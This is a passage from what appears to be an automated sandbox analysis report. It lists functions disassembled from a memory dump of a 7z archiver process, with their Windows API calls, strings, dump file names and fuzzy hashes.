                                                                                                                                                                                                • Opcode ID: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                • Instruction ID: 3ba5821bc2b15d5d44854819ddde966cbe6b67c8ff09e766170f6bc67d3081dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d8e5875d3dc795eb3d600148a840ab749245db3ba8f1a9a9afcbd51cdf2eb3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A314132215A408AD630AF12F991B6FB764F7D6BE0F588221EBED47B95DE3DC4918700
                                                                                                                                                                                                Function 0094ABB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                • API String ID: 1197914913-1127948838
                                                                                                                                                                                                • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                • Instruction ID: 2efe7deb4e95428d8c715ed1ba99ad18f8fa643003b83c43d6dbf3f3adf8ffd7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811893321AF4696DB50CF55F490B9AB364F7A5B80F44A022EB8E03728EF38C559CB00
                                                                                                                                                                                                Function 0094B114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188timeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32 ref: 0094B12A
                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32 ref: 0094B13E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$File$LocalSystem
                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                • API String ID: 1748579591-1553575800
                                                                                                                                                                                                • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                • Instruction ID: 0e4545c8491a5b522ec9d6686c141d5d033b37323f716722681581dfe7559cb9
                                                                                                                                                                                                • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                • Instruction Fuzzy Hash: CA518893B042C04BD7198B3DD846BCDBFC1E3A5758F48822ADB9587786E66DC50AC721
                                                                                                                                                                                                Function 0094B5E0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0094B5B8: GetCurrentProcess.KERNEL32 ref: 0094B5C2
                                                                                                                                                                                                • GetSystemInfo.KERNEL32 ref: 0094B624
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1098911721-0
                                                                                                                                                                                                • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                • Instruction ID: 3dad5e1f274668cec36d330023370e909d51d5c079acb29622dce216b133764d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0926662449483CF30DB08D452F2DB360F394B55FC15611E68982E09DF3DC614CF00
                                                                                                                                                                                                Function 0098D690 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                • Instruction ID: 28c2724fb23dbda97642d8b7dd185ece33fef4764bb070aebcff4110c2f5ae3c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CE042F290A2058FD3D98F6AD4412587EE4F748795B60C13FA608D3301D37581888F92
                                                                                                                                                                                                Function 00960C24 Relevance: 97.9, APIs: 78, Instructions: 364COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                • Instruction ID: 3cd5a2f2a69c06fecebaca31f39929407c684951ba21c691efceb2583dfb59ef
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BD1B12225D5C081CA64FF35E491B6FA760FBC67C4F905152BB9E93B39DE68C886CB04
                                                                                                                                                                                                Function 00972A7D Relevance: 44.0, APIs: 35, Instructions: 257COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                • Instruction ID: 8efe30366a5cb8fa73a82f2a806e9837844e82ed49aa868aba8ab612ee7505bf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78911A23219AC486CA28EF36D065F6E67A4FBCBF85F455462EB4E53711CE38C485C705
                                                                                                                                                                                                Function 009866A8 Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 131libraryloadertimeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                                                                                • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                                                                                • API String ID: 600854398-319139910
                                                                                                                                                                                                • Opcode ID: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                • Instruction ID: 8447feac5e9bae75ea48ac376d23da600797829c0f98c9ec7b4ff123b9115442
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8351C366305A8181EF20EF69F8547996360F789BC0F44902AEE8D4776AEF3CC549C700
                                                                                                                                                                                                Function 00961DB4 Relevance: 41.7, APIs: 33, Instructions: 418COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                • Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                • Instruction ID: 0a2d7d7be468e2d7152d3e7e12eabbb81ceab88d3e4d7a75ce78cd188c7c7388
                                                                                                                                                                                                • Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9E1A333708AD086CA34EF16E4816ADA764F7CABD0F494126FF9D57B19CE69C886C740
                                                                                                                                                                                                Function 009505A0 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 209COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                • API String ID: 3957182552-3922825594
                                                                                                                                                                                                • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                • Instruction ID: 2e41ab8386c3db5df63d96c1da8538f0a95a77028d8848db9b9b84169914e025
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF8185236195C496CB20EF26D891BAE7364FBC5B84F814112FF9E47765DE38C98ACB40
                                                                                                                                                                                                Function 00945D18 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                • String ID: Empty file path
                                                                                                                                                                                                • API String ID: 462375450-1562447899
                                                                                                                                                                                                • Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                • Instruction ID: 0c38b31f4e3e2072a53feb34b094b2ae17ee3936c4ae218d73c79bb3b2534e59
                                                                                                                                                                                                • Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62D1D332218AC096CB20EF25D490B9EB764FBC9B94F554125EF9A47B6ADF38C945CB00
                                                                                                                                                                                                Function 0094A224 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                • API String ID: 0-1962706685
                                                                                                                                                                                                • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                • Instruction ID: f0c677c9cc399ad92a181adb42116ec42ccf058b296b50842666347fc28adf4f
                                                                                                                                                                                                • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                • Instruction Fuzzy Hash: D3B1A02224864090CE20FF31D461EAEA764FBD67D4F855112FE4E47779DF69C986CB02
                                                                                                                                                                                                Function 00941C58 Relevance: 31.5, APIs: 25, Instructions: 294COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941C98
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00941CB9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                • Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                • Instruction ID: f741cfc03f39a23d91283f37426e9d76e4b691d1b51ff7421a6397a434d6b5dc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                • Instruction Fuzzy Hash: 72A1902264868485CB24EF15E491E6EB765FBD67D0F905112FB9E43B69DF2CC8CACB00
                                                                                                                                                                                                Function 00987F50 Relevance: 30.2, APIs: 24, Instructions: 154COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                • Instruction ID: 5fbbe8ef8a03d2fef54c1d24a6a51ba924e07471fc2db4ff0b65797a17ad5570
                                                                                                                                                                                                • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96514027614AC089C725FF31D95176A6325FBDAF98F990172EF2D1B759DF20C8428320
                                                                                                                                                                                                Function 00986C04 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free$fputc
                                                                                                                                                                                                • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                                                                • API String ID: 2662072562-1527772849
                                                                                                                                                                                                • Opcode ID: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                • Instruction ID: 4c2e80ecb75cd3995ae48c911bacfe874e32d97db0ab961b2d46d40ac98953de
                                                                                                                                                                                                • Opcode Fuzzy Hash: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19518D7630454082CE20FF25EA95B6E7326FBC5BD8F844126EE5E0B7AADF28C945C340
                                                                                                                                                                                                Function 00961988 Relevance: 27.7, APIs: 22, Instructions: 211COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                • Instruction ID: 4c41f3042512a3648a8c0d20e597f81924b08b2d8e83163c8de0a9f838227f51
                                                                                                                                                                                                • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                • Instruction Fuzzy Hash: A1717B22719AC091CA20EF25E891B9EA760FBC67D0F545122FF9E57B6DDF28C546C700
                                                                                                                                                                                                Function 0097187D Relevance: 25.2, APIs: 20, Instructions: 214COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 0097187D
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrowfreemalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2861928636-0
                                                                                                                                                                                                • Opcode ID: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                • Instruction ID: 5a5e3220f1c7b91ffb7b5e5a8711e0f59f16b58df3c66597a8d4e23cf9b7b00c
